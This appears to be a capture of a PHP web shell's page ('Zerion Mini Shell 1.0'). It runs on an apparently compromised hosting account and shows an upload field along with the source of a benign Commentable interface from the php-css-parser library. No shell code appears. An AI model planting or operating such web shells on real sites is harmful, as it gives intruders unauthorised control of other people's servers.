ok

Mini Shell

Direktori : /home2/selectio/public_html/innerstore/vendor/sabberworm/php-css-parser/src/Comment/
Upload File :
Current File : /home2/selectio/public_html/innerstore/vendor/sabberworm/php-css-parser/src/Comment/Commentable.php

<?php

namespace Sabberworm\CSS\Comment;

interface Commentable
{
    /**
     * @param array<array-key, Comment> $aComments
     *
     * @return void
     */
    public function addComments(array $aComments);

    /**
     * @return array<array-key, Comment>
     */
    public function getComments();

    /**
     * @param array<array-key, Comment> $aComments
     *
     * @return void
     */
    public function setComments(array $aComments);
}

Zerion Mini Shell 1.0